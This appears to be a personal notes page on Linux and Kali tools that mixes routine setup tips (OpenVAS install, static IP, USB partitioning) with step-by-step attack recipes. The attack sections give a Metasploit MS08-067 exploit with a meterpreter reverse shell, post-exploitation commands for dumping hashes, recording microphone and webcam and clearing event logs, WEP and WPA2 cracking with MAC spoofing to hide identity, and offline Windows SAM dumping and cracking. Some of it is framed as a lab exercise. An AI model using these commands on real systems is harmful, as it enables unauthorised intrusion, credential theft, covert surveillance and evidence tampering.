Linux OS

Information about the Linux operating system

OpenVAS is no longer included by default with Kali Linux.  To setup OpenVAS perform the following steps.  make sure you have the repository available in sources.list file.

nano  /etc/apt/sources.list

And make sure the following line is present.  If it is not, add it.

deb http://http.kali.org/kali kali-rolling main non-free contrib

You can now install OpenVAS with the following commands:

apt update

apt install openvas

openvas-setup

The openvas-setup command takes awhile to complete, so do not become impatient.  When it finishes running, be sure to copy the password into text editor and save. Now you need to rebuild your OpenVAS database with the following command:

openvasmd –rebuild

This command will also take awhile to complete.  Once it completes, you can access the web interface at https://localhost:9392.  The username is admin and the password previously saved.

A dictionary attack against a WPA2 protected access point is very easy using Kali Linux 2.0 and wifite.

wifite –wpa — crack –aircrack –dict /usr/share/wordlists/sqlmap.txt

I would recommend using a larger dictionary file than the sqlmap.txt file, Several large dictionary files are available online.

This should also work for command line IP address changes to Linux:

edit the file /etc/network/interfaces

Change:

auto eth0
iface eth0 inet dhcp

To:

auto eth0
iface eth0 inet static
address 172.16.40.10
netmask 255.255.0.0
network 172.16.0.0
broadcast 172.16.255.255
gateway 172.16.2.47
dns-nameservers 172.16.2.4 172.16.2.15

Restart neworking

sudo /etc/init.d/networking restart

Raspberry-Pi-LogoInformation about Raspberry Pi can be found at http://www.raspberrypi.org/.

SD Card boot choices for Raspberry Pi:

Instructions for building a Pirate Radio setup can be found at http://makezine.com/projects/make-38-cameras-and-av/raspberry-pirate-radio/.

Follow these steps:

  1. Insert your USB Flash Drive into an available port.
  2. Open the Command Prompt (Admin) by right-clicking on the Start button, clicking Command Prompt (Admin), and then click Yes on the UAC prompt.
  3. Type “diskpart”and press Enter.
  4. Type “list disk” to determine the disk number of your USB Flash Drive.  Type “select disk X”, where “X” is the disk number of your USB Flash Drive.
  5. Type “clean” to erase the contents of your USB Flash Drive.
  6. Type “create partition primary size =5000”. This will create a 5GB primary partition on the USB Flash Drive.  You can later create an additional partition on the USB Flash Drive for persistent storage.
  7. Type “select partition 1”.
  8. Type “active” to make the partition active
  9. Type “format fs=ntfs quick” to format the partition.
  10. Type “assign” to give the USB Flash Drive a drive letter.
  11. Copy the contents of the Windows 8.1 DVD to the USB Flash Drive.

Alternatively, you can download the Universal USB Installer from http://www.pendrivelinux.com and follow the instructions on the site.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.

Metasploit:

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.45

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack, crackstation.net
record_mic #record audio
webcam_list #list available webcams
web_snap #take a picture with the webcam
web_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute –f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system

Cracking WEP in Kali Linux 2.0 has become extrememly easy.  Open WiFite from the Applications menu and at the prompt type:

wifite –wep

Follow the onscreen instructions and the work is done for you.

 

WEP cracking instructions for Kali Linux 1.0

>>>Open a new terminal window

airmon-ng

# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0

airmon-ng stop wlan0

# Stops the airmon-ng daemon

ifconfig wlan0 down

# stops the wireless interface

macchanger –mac 00:11:22:33:44:55 wlan0

# Spoofs your MAC address to hide your identity

airmon-ng start wlan0

# Starts the airmon-ng daemon

airodump-ng wlan0

# Locate available wireless access points to attack
# For our lab, look for WEPDEmo and note BSSID(MAC) and channel

airodump-ng -c 6 -w wepdemoattack –bssid 20:AA:4B:8B:A4:6E wlan0

# Start monitoring WEPDEmo for for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the file to save as
# –bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking
# wlan0 the wireless card you are monitoring with

>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Attempt to associate with the wireless access point
# -1 0 This is the number 1 and specifies the type of attack, fake authentication and    # delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access points SSID
# wlan0 is the interface we are attacking with

aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0

#Will send traffic to the access point and monitor

aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap

# Will attempt to crack the WEP encryption that has been detected so far
# Will check as you run it and then every 5000 ISVs – listed as #Data on the airodump    # terminal
>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

#Repeatedly run this to attempt to generate more traffic to speed up the attack
Eventually on the aircrack-ng screen you should see the correct WEP key

26:27:F6:85:97 for my demo

 

 

It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Restart the target Windows computer with your KALI Linux 2.0 system.  From time to time when you try to access the hard drive containing the Windows partition you may receive an error message related to the Windows hibernation file.  To avoid this, shutdown Windows at the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem.  Once you are in KALI, open up FILES and select your Windows hard drive to mount it.  Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive.  Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1.  Your path will be something like /media/root/OSDisk.  Browse to your mount point/Windows/System32/config folder.  Use the follwoing command to create a dump of the Windows passwords:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 –format=NT

 

For Kali Linux prior to version 2.0

Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt –format=nt2

service postgresql start #start the db
service metasploit start # connect metasploit to database
db_rebuild_cache #build cache for searching
db_status # check status of db
db_nmap <target IP> #add listening ports to database
hosts # shows scanned targets
services # show services on targets
search <service  name> # find a possible exploit
use exploit/<exploit name> # run the exploit
show options # for options to configure like set RHOST
check # will see if target is exploitable
exploit # to try the exploit